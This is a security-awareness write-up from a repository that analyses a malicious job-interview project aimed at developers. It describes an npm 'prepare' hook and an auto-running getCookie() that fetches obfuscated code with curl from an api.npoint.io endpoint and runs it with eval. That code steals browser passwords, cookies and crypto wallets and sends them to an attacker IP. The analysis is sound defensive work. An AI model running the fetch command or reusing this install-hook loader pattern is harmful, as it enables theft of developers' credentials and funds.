The idea of this repo is to show how developers sometimes become targets of hacking by people pretending to want to hire us.
WARNING: DO NOT EXECUTE OR INSTALL ANYTHING FROM THIS REPOSITORY
In package.json, the "prepare" script is a lifecycle script run by npm and yarn when you execute certain commands (like npm install or when publishing a package).
"prepare": "concurrently \"node server/server.js\" \"react-scripts build\"",Here, the prepare script will start both the backend server (node server/server.js) and build the React frontend (react-scripts build) at the same time using the concurrently tool.
The frontend contains a function called getCookie() that auto-executes, and fetches payload from the malicious external server: api.npoint.io/...
This server retrieves obfuscated code:
Techniques:
- Variable name mangling
- String encoding (base85-like custom encoding)
- Control flow obfuscation
- Dynamic function generation
curl -L -s https://api.npoint.io/4072eb8fe5d3580d84bf
{"cookie":"{function _0x55d4(_0x40abc4,_0x10e375){const _0x2e0885=_0x3c13();return _0x55d4=function(_0x3c137b,_0x55d45e){_0x3c137b=_0x3c137b-(0x1*0x11a5+-0x15c2+0x4df);let _0x16bb10=_0x2e0885[_0x3c137b];return _0x16bb10;},_0x55d4(_0x40abc4,_0x10e375);}(function(..."}The getCookie() function immediately executes the retrieved payload using eval(res.data.cookie), allowing the malicious code to run without any user interaction.
Because this logic resides in the "prepare" script within package.json, it means that as soon as you execute npm install in the project directory, the attack sequence is initiated automatically. This seamless integration ensures the malicious activity begins as soon as a developer starts working with the project.
The highly obfuscated code does:
- It scans for browser profiles (Chrome, Opera, Brave).
- It extracts stored passwords and browser cookies.
- It identifies and enumerates crypto wallet extensions.
- It gathers detailed system information.
- It packages all collected data methodically in preparation for exfiltration.
Finally, all the stolen information is covertly transmitted to the attacker's server at http://23.227.202.24, enabling swift and undetected data extraction.